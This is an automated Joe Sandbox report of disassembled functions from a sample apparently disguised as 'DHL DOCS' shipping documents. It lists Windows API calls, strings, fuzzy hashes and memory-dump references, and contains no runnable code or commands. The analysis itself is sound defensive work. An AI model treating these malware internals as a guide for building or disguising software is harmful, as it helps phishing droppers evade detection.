Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: 8]
API String ID: 3880355969-438778366
Opcode ID: b45ea21910e33c5f8caaffccfef7a2d980edb60a9c0f68745e481772c7c13f21
Instruction ID: 80053a7191c4fa01de80175db5b7ff06fa86d059dcfb3afd54c29731850b0afd
Opcode Fuzzy Hash: b45ea21910e33c5f8caaffccfef7a2d980edb60a9c0f68745e481772c7c13f21
Instruction Fuzzy Hash: 5C515E74A1024AEFCF18DF58D8889AE7BB5FF46760F108199F8159B290D730EDA1CB51

Function 0021719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00217206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0021723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0021724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002172CF

Strings

DllGetClassObject, xrefs: 00217242

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ace7e68b856efb751e856b5da9d7d20d2cccb2ee643a0a2a524563851fe9b916
Instruction ID: def1771920c2a02eb99446ed9dc8104dbeece9b00fdd7e9f91a2c89da9812030
Opcode Fuzzy Hash: ace7e68b856efb751e856b5da9d7d20d2cccb2ee643a0a2a524563851fe9b916
Instruction Fuzzy Hash: 5B418171614204EFDB15CF54C884ADA7BF9EF99310F2480A9BD099F20AD7B1D995CBA0

Function 002452C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00245352
GetWindowLongW.USER32(?,000000F0), ref: 00245375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00245382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002453A8

Strings

8], xrefs: 002452F1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID: 8]
API String ID: 3340791633-438778366
Opcode ID: 0836fc4e3f707ed7a462399258e689537517fcc4fb48fb1e6c95947fdb2c49cb
Instruction ID: 9be576f53b4187c37497af3561a9376894c8850170f23e289d72b4630f102fb0
Opcode Fuzzy Hash: 0836fc4e3f707ed7a462399258e689537517fcc4fb48fb1e6c95947fdb2c49cb
Instruction Fuzzy Hash: F431C634A76A29EFEB389E14CC09FE83F65AB05390F544181FA90961E2C7F49DA0DB41

Function 00247674 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0024769A
GetWindowRect.USER32(?,?), ref: 00247710
PtInRect.USER32(?,?,00248B89), ref: 00247720
MessageBeep.USER32(00000000), ref: 0024778C

Strings

8], xrefs: 002476D6, 00247733

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID: 8]
API String ID: 1352109105-438778366
Opcode ID: da2c44698c621f4254a523e5759dfe6872a131c87c856b10650d16b50bb8e011
Instruction ID: bb4d30d8644d387d25064c76a6c060c51b8b4d796cd37379e89d6f815263a37a
Opcode Fuzzy Hash: da2c44698c621f4254a523e5759dfe6872a131c87c856b10650d16b50bb8e011
Instruction Fuzzy Hash: 1D41B338616215DFCB19CF58D898EA9B7F9FF49314F5540A8E424DB2A1C730E952CF90

Function 0023C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023C9F1
_wcslen.LIBCMT ref: 0023CA68
_wcslen.LIBCMT ref: 0023CA9E
_wcslen.LIBCMT ref: 0023CAF9
_wcslen.LIBCMT ref: 0023CB2F
_wcslen.LIBCMT ref: 0023CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 0023CA62, 0023CA67
HKLM, xrefs: 0023CA98, 0023CA9D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: c7b19b001ecc916532cff05988d5e64b3b10d8206c1f2a8ffbd8ec4f8ea199ca
Instruction ID: f5e384402ed5f5b5eae3f0638ca74d3794081b7224e8ab89d0fe083000a580ff
Opcode Fuzzy Hash: c7b19b001ecc916532cff05988d5e64b3b10d8206c1f2a8ffbd8ec4f8ea199ca
Instruction Fuzzy Hash: 4431E4B3A2016B4BCB20EF6DD8501BE33919BA1754F35402AE845BB349EB71CE61D3A0

Function 00244653 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00244705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00244713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0024471A

Strings

8], xrefs: 002446D0, 002446EF
msctls_updown32, xrefs: 00244684

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: 8]$msctls_updown32
API String ID: 4014797782-1314570666
Opcode ID: 3fb1037b33dba2fbb3fc94e675f5530d8beb047a5fe3ff86d16416c159397178
Instruction ID: e98dd7ade292568764f96816b9c817cb8ce2f5ff2c108341e7b91ab109620628
Opcode Fuzzy Hash: 3fb1037b33dba2fbb3fc94e675f5530d8beb047a5fe3ff86d16416c159397178
Instruction Fuzzy Hash: 3C218EB5611209AFDB15EF68DC85DA777ADEB5A394B000059FA049B391CB30EC22CB60

Function 00242F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00242F8D
LoadLibraryW.KERNEL32(?), ref: 00242F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00242FA9
DestroyWindow.USER32(?), ref: 00242FB1

Strings

SysAnimate32, xrefs: 00242F68

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 25ca1ae248fe7852bd617c96926264bd8fe668c107a0d55d0f85a050fd889819
Instruction ID: efa7150cad419fc60afeec0259e1d280738e646da4b02efdfc2bdd326761acb1
Opcode Fuzzy Hash: 25ca1ae248fe7852bd617c96926264bd8fe668c107a0d55d0f85a050fd889819
Instruction Fuzzy Hash: DD21F071220206EBEB144F66DC84EBB37BDEB59364F924218F910D6490C371DC699760

Function 00248FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

GetCursorPos.USER32(?), ref: 00249001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00207711,?,?,?,?,?), ref: 00249016
GetCursorPos.USER32(?), ref: 0024905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00207711,?,?,?), ref: 00249094

Strings

8], xrefs: 0024902E, 00249064

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: 8]
API String ID: 2864067406-438778366
Opcode ID: f3049ce292a50ae85b50d02003f555e2e22239638a24534b6dda9ce388827893
Instruction ID: 16277a3f78526d29d986361b5ce432db2454ab9ec3b91fcec8c2c1d92cfd37ab
Opcode Fuzzy Hash: f3049ce292a50ae85b50d02003f555e2e22239638a24534b6dda9ce388827893
Instruction Fuzzy Hash: E121BF35611018EFDB29CF98D859EEB3BB9EB8A350F104069F905572A1C7319DA0DB60

Function 001D4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001D4D1E,001E28E9,?,001D4CBE,001E28E9,002788B8,0000000C,001D4E15,001E28E9,00000002), ref: 001D4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001D4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,001D4D1E,001E28E9,?,001D4CBE,001E28E9,002788B8,0000000C,001D4E15,001E28E9,00000002,00000000), ref: 001D4DC3

Strings

mscoree.dll, xrefs: 001D4D86
CorExitProcess, xrefs: 001D4D98

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b4f624c1876fc20204c9b74d4a3f2ef0d27cd05e3563bc30f295b8fcdff618cb
Instruction ID: 2d2d5dc15d4ce2b25098db4d5897aedaa1165d51df6ff8629cdea991a8027e9a
Opcode Fuzzy Hash: b4f624c1876fc20204c9b74d4a3f2ef0d27cd05e3563bc30f295b8fcdff618cb
Instruction Fuzzy Hash: 22F0C234A01208BBDB159F94EC4DBADBFB5EF09712F1000A9FC09A2260CB305E40CF94

Function 0020D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0020D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0020D3BF
FreeLibrary.KERNEL32(00000000), ref: 0020D3E5

Strings

X64, xrefs: 0020D2A8
GetSystemWow64DirectoryW, xrefs: 0020D3B9

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 973e256d03a2dd8907cbe9494a85a9d0a4ad97a3cd98bcaac67ea974cc36c2e9
Instruction ID: d7c53018a172517d75603c45464b314ab198bb219e8147094b1b60c70f17e64c
Opcode Fuzzy Hash: 973e256d03a2dd8907cbe9494a85a9d0a4ad97a3cd98bcaac67ea974cc36c2e9
Instruction Fuzzy Hash: 9EF05C75837712EFD3741B544C08A5977149F11B01B608498F809E10C7CB60CD708F92

Function 001B4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001B4EDD,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001B4EAE
FreeLibrary.KERNEL32(00000000,?,?,001B4EDD,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 001B4EA8
kernel32.dll, xrefs: 001B4E94

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 5d578596dcf16c3af1360bdbbbe8111a8f200711825f76b080b4c515d1b5b43d
Instruction ID: b7353fa0f44b724795551e306449c710e54f4439f6673d6d59ca9229edd6b4aa
Opcode Fuzzy Hash: 5d578596dcf16c3af1360bdbbbe8111a8f200711825f76b080b4c515d1b5b43d
Instruction Fuzzy Hash: D4E0CD39A035225BD271172D7C1CB9F6554AF83F627154115FC0CD2102DB64CD0185B5

Function 001B4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001F3CDE,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001B4E74
FreeLibrary.KERNEL32(00000000,?,?,001F3CDE,?,00281418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001B4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 001B4E6E
kernel32.dll, xrefs: 001B4E5B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: cd0f84a3f55cda69f62c803d196df1c26ff3326c2fe46d9b438ac67c0a2f794e
Instruction ID: 2453c485c2ea7e377950fcb2ecc703875223454d6fefe298852b7e9528d980f0
Opcode Fuzzy Hash: cd0f84a3f55cda69f62c803d196df1c26ff3326c2fe46d9b438ac67c0a2f794e
Instruction Fuzzy Hash: 28D0C239503A215766621B287C0CDCB6B18AF87B113158110F80CA2111CF24CD01C5E0

Function 00222947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00222C05
DeleteFileW.KERNEL32(?), ref: 00222C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00222C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00222CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00222CC0

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: f6cdd3c82ddce958e5d7ee2283ba94c5ce88c165efa07044637bcd1e772c8084
Instruction ID: 482107fc7244db54da9f89fd4397a97cb9ec47ca950ce7a04bc0c1cafed37085
Opcode Fuzzy Hash: f6cdd3c82ddce958e5d7ee2283ba94c5ce88c165efa07044637bcd1e772c8084
Instruction Fuzzy Hash: 4AB16D72910129BBDF21EFE4DC85EDEB7BDEF19300F1040A6F509A6241EB719A588F61

Function 0023A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0023A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0023A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0023A468
CloseHandle.KERNEL32(?), ref: 0023A63D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 8daad1a44892c4ccabbdc87cd12ea41a8d84f1dc1f84d96e249db206080c0231
Instruction ID: 3419bba67904b5b7e2177cb9f7e644e6aabf3ff7bfc2bedc4fcbbe2af19b7d7d
Opcode Fuzzy Hash: 8daad1a44892c4ccabbdc87cd12ea41a8d84f1dc1f84d96e249db206080c0231
Instruction Fuzzy Hash: 7FA1C2B16043019FD720DF28D886F2AB7E5AF94714F14885CF59A9B3D2DBB0EC408B92

Function 0021E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0021DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0021CF22,?), ref: 0021DDFD

Part of subcall function 0021DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0021CF22,?), ref: 0021DE16

Part of subcall function 0021E199: GetFileAttributesW.KERNEL32(?,0021CF95), ref: 0021E19A

lstrcmpiW.KERNEL32(?,?), ref: 0021E473
MoveFileW.KERNEL32(?,?), ref: 0021E4AC
_wcslen.LIBCMT ref: 0021E5EB
_wcslen.LIBCMT ref: 0021E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0021E650

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 4ab5a4c3b23f7627b70bba8a3f19fa0266c6c4c0d4435ffc672cb57e055a9c32
Instruction ID: 56f5b47b4afa2bfb830ecfcd1975f520c6ad67f13bf771eb8510925642d2c90e
Opcode Fuzzy Hash: 4ab5a4c3b23f7627b70bba8a3f19fa0266c6c4c0d4435ffc672cb57e055a9c32
Instruction Fuzzy Hash: AA5183B24083859BCB24DF94DC819DB73ECAFA5340F10491EFA89D3151EF74A5988B66

Function 0023B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 0023C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0023B6AE,?,?), ref: 0023C9B5
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023C9F1
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023CA68
Part of subcall function 0023C998: _wcslen.LIBCMT ref: 0023CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0023BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0023BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0023BB63
RegCloseKey.ADVAPI32(?,?), ref: 0023BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0023BBB3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: f4e4e5c77c83fb6629814dad7819e2643c607c58ba1297f1e45be89db685a395
Instruction ID: c2c0509aeb9cf67f1958912b1829da16a3e9b3939a4f6b218c7ab6ca4e3d82a2
Opcode Fuzzy Hash: f4e4e5c77c83fb6629814dad7819e2643c607c58ba1297f1e45be89db685a395
Instruction Fuzzy Hash: 5F61C071218201AFC315DF24C490E6ABBE5FF84308F54899DF5998B2A2CB31ED46CB92

Function 00218BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00218BCD
VariantClear.OLEAUT32 ref: 00218C3E
VariantClear.OLEAUT32 ref: 00218C9D
VariantClear.OLEAUT32(?), ref: 00218D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00218D3B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

